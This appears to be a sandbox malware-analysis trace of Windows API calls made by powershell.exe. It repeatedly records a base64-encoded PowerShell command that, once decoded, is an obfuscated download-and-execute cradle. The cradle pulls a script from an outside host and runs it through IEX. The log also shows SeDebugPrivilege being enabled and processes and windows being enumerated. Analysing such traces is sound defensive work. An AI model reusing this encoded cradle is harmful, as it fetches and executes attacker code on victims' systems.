	[0668.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0668.093] CoTaskMemFree (pv=0x2a8ab0) 
	[0668.094] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0668.094] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0668.094] CoTaskMemFree (pv=0x2a8ab0) 
	[0668.108] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0668.108] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0668.108] CoTaskMemFree (pv=0x2a8ab0) 
	[0668.110] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ae0a0 | out: pNumArgs=0x1c7ae0a0) returned 0x246df0*=""
	[0668.112] lstrlenW (lpString="-EncodedCommand") returned 15
	[0668.113] CoTaskMemAlloc (cb=0x22) returned 0x1b3fdda0
	[0668.113] RtlMoveMemory (in: Destination=0x1b3fdda0, Source=0x246e12, Length=0x20 | out: Destination=0x1b3fdda0) 
	[0668.113] CoTaskMemFree (pv=0x1b3fdda0) 
	[0668.113] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0668.113] CoTaskMemAlloc (cb=0x2f4) returned 0x1b40acb0
	[0668.113] RtlMoveMemory (in: Destination=0x1b40acb0, Source=0x246e32, Length=0x2f2 | out: Destination=0x1b40acb0) 
	[0668.113] CoTaskMemFree (pv=0x1b40acb0) 
	[0668.114] LocalFree (hMem=0x246df0) returned 0x0
	[0668.115] CoTaskMemAlloc (cb=0x804) returned 0x1b40acb0
	[0668.115] GetConsoleTitleW (in: lpConsoleTitle=0x1b40acb0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0668.115] CoTaskMemFree (pv=0x1b40acb0) 
	[0668.125] CoTaskMemAlloc (cb=0x38e) returned 0x246df0
	[0668.125] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7ae000*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e92af0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e92af0*(hProcess=0x344, hThread=0x3a0, dwProcessId=0x1db0, dwThreadId=0x1db4)) returned 1
	[0668.139] CoTaskMemFree (pv=0x246df0) 
	[0668.141] CloseHandle (hObject=0x3a0) returned 1
	[0668.141] CoTaskMemAlloc (cb=0x3b) returned 0x1b403560
	[0668.141] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae0a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae0a8) returned 0x4550
	[0668.142] CoTaskMemFree (pv=0x1b403560) 
	[0668.145] GetCurrentProcess () returned 0xffffffffffffffff
	[0668.145] GetCurrentProcess () returned 0xffffffffffffffff
	[0668.146] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ae188, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ae188*=0x3a0) returned 1

Process:
	id = "28"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1ad99000"
	os_pid = "0x204"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 162
	os_tid = 0x88c

	[0456.706] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0459.015] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0459.016] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0459.016] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0459.016] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0463.530] GetVersionExW (in: lpVersionInformation=0xed940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.532] GetVersionExW (in: lpVersionInformation=0xed940*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed940*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0463.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0463.544] GetVersionExW (in: lpVersionInformation=0xed6b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed6b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.545] SetErrorMode (uMode=0x1) returned 0x1
	[0463.546] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xed810 | out: lpFileInformation=0xed810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0463.547] SetErrorMode (uMode=0x1) returned 0x1
	[0463.550] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xeda80 | out: lpdwHandle=0xeda80) returned 0x94c
	[0463.552] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be72d8 | out: lpData=0x2be72d8) returned 1
	[0463.554] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed9f8, puLen=0xed9f0 | out: lplpBuffer=0xed9f8*=0x2be7374, puLen=0xed9f0) returned 1
	[0463.557] lstrlenW (lpString="䅁") returned 1
	[0463.565] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be7450, puLen=0xed960) returned 1
	[0463.566] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0463.568] CoTaskMemAlloc (cb=0x2e) returned 0x321b10
	[0463.568] lstrcpyW (in: lpString1=0x321b10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0463.569] CoTaskMemFree (pv=0x321b10) 
	[0463.569] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be74a4, puLen=0xed960) returned 1
	[0463.569] lstrlenW (lpString="System.Management.Automation") returned 28
	[0463.569] CoTaskMemAlloc (cb=0x3c) returned 0x259b30
	[0463.569] lstrcpyW (in: lpString1=0x259b30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0463.569] CoTaskMemFree (pv=0x259b30) 
	[0463.570] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be7500, puLen=0xed960) returned 1
	[0463.570] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0463.570] CoTaskMemAlloc (cb=0x20) returned 0x318c00
	[0463.570] lstrcpyW (in: lpString1=0x318c00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0463.570] CoTaskMemFree (pv=0x318c00) 
	[0463.570] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be7540, puLen=0xed960) returned 1
	[0463.570] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0463.570] CoTaskMemAlloc (cb=0x44) returned 0x259b30
	[0463.570] lstrcpyW (in: lpString1=0x259b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0463.570] CoTaskMemFree (pv=0x259b30) 
	[0463.570] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be75a8, puLen=0xed960) returned 1
	[0463.570] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0463.570] CoTaskMemAlloc (cb=0x76) returned 0x2c1270
	[0463.570] lstrcpyW (in: lpString1=0x2c1270, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0463.570] CoTaskMemFree (pv=0x2c1270) 
	[0463.570] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be7644, puLen=0xed960) returned 1
	[0463.570] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0463.570] CoTaskMemAlloc (cb=0x44) returned 0x259b30
	[0463.570] lstrcpyW (in: lpString1=0x259b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0463.570] CoTaskMemFree (pv=0x259b30) 
	[0463.570] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be76a8, puLen=0xed960) returned 1
	[0463.570] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0463.570] CoTaskMemAlloc (cb=0x58) returned 0x288c50
	[0463.570] lstrcpyW (in: lpString1=0x288c50, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0463.570] CoTaskMemFree (pv=0x288c50) 
	[0463.570] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be7724, puLen=0xed960) returned 1
	[0463.570] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0463.570] CoTaskMemAlloc (cb=0x20) returned 0x318c00
	[0463.570] lstrcpyW (in: lpString1=0x318c00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0463.570] CoTaskMemFree (pv=0x318c00) 
	[0463.571] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x2be73cc, puLen=0xed960) returned 1
	[0463.571] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0463.571] CoTaskMemAlloc (cb=0x66) returned 0x29c1a0
	[0463.571] lstrcpyW (in: lpString1=0x29c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0463.571] CoTaskMemFree (pv=0x29c1a0) 
	[0463.571] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x0, puLen=0xed960) returned 0
	[0463.571] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x0, puLen=0xed960) returned 0
	[0463.571] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xed968, puLen=0xed960 | out: lplpBuffer=0xed968*=0x0, puLen=0xed960) returned 0
	[0463.571] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xed938, puLen=0xed930 | out: lplpBuffer=0xed938*=0x2be7374, puLen=0xed930) returned 1
	[0463.572] CoTaskMemAlloc (cb=0x204) returned 0x2c9430
	[0463.572] VerLanguageNameW (in: wLang=0x0, szLang=0x2c9430, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0464.748] CoTaskMemFree (pv=0x2c9430) 
	[0464.748] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\", lplpBuffer=0xed988, puLen=0xed980 | out: lplpBuffer=0xed988*=0x2be7300, puLen=0xed980) returned 1
	[0464.753] GetCurrentProcessId () returned 0x204
	[0464.768] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xec8b0 | out: lpLuid=0xec8b0*(LowPart=0x14, HighPart=0)) returned 1
	[0464.771] GetCurrentProcess () returned 0xffffffffffffffff
	[0464.772] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xec8d0 | out: TokenHandle=0xec8d0*=0x2dc) returned 1
	[0464.773] AdjustTokenPrivileges (in: TokenHandle=0x2dc, DisableAllPrivileges=0, NewState=0x2beab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0464.775] CloseHandle (hObject=0x2dc) returned 1
	[0464.779] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x204) returned 0x2dc
	[0464.788] EnumProcessModules (in: hProcess=0x2dc, lphModule=0x2beabb8, cb=0x200, lpcbNeeded=0xed8e8 | out: lphModule=0x2beabb8, lpcbNeeded=0xed8e8) returned 1
	[0465.523] GetModuleInformation (in: hProcess=0x2dc, hModule=0x13f370000, lpmodinfo=0x2beae28, cb=0x18 | out: lpmodinfo=0x2beae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0465.524] CoTaskMemAlloc (cb=0x804) returned 0x325080
	[0465.524] GetModuleBaseNameW (in: hProcess=0x2dc, hModule=0x13f370000, lpBaseName=0x325080, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0465.524] CoTaskMemFree (pv=0x325080) 
	[0465.525] CoTaskMemAlloc (cb=0x804) returned 0x325080
	[0465.525] GetModuleFileNameExW (in: hProcess=0x2dc, hModule=0x13f370000, lpFilename=0x325080, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0465.525] CoTaskMemFree (pv=0x325080) 
	[0465.526] CloseHandle (hObject=0x2dc) returned 1
	[0465.533] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x204) returned 0x2dc
	[0465.533] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0xeda18 | out: lpExitCode=0xeda18*=0x103) returned 1
	[0465.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb088, Length=0x20000, ResultLength=0xed9e0 | out: SystemInformation=0x12beb088, ResultLength=0xed9e0*=0x2c350) returned 0xc0000004
	[0465.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b0b8, Length=0x2eb50, ResultLength=0xed9e0 | out: SystemInformation=0x12c0b0b8, ResultLength=0xed9e0*=0x2c350) returned 0x0
	[0465.553] EnumWindows (lpEnumFunc=0x2ab66ac, lParam=0x0) returned 1
	[0468.223] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0468.737] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x558
	[0469.330] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0469.331] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0469.674] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0470.190] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x538
	[0470.191] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0470.780] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x778
	[0471.162] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x778
	[0471.162] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.162] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.163] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1694
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1770
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1720
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x165c
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1578
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x16c0
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x161c
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1638
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x15c8
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1554
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1674
	[0471.164] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1520
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x14bc
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf8c
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe9c
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1434
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x14ec
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xfcc
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x12ac
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1484
	[0471.165] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x934
